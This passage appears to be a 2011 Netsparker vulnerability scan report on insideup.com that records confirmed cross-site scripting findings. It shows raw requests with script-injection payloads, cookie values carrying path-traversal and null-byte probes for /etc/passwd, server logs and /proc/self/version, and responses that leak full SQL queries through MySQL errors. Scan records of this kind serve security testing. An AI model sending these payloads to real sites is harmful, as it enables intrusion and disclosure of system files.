OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e20ou7mddrehq6s8pgevnrv6h1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc='%22--%3E%3C/style%3E%3C/..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET '"--></style></script><script>alert(0x0005FA)</script>

Request

GET /ppc/leadflow/lodi00/project.php?catId=110003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FA)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=38n5v6ll5kg3ehm3q3m7oecek1; path=/
Content-Length: 3263
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '"--></style></script><script>alert(0x0005FB)</script>

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4uspumaqtv5d95uposjnv31d30; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/

/ppc/leadflow/dima00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/?'"--></style></script><script>alert(0x0005F9)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F9)</script>

Request

GET /ppc/leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
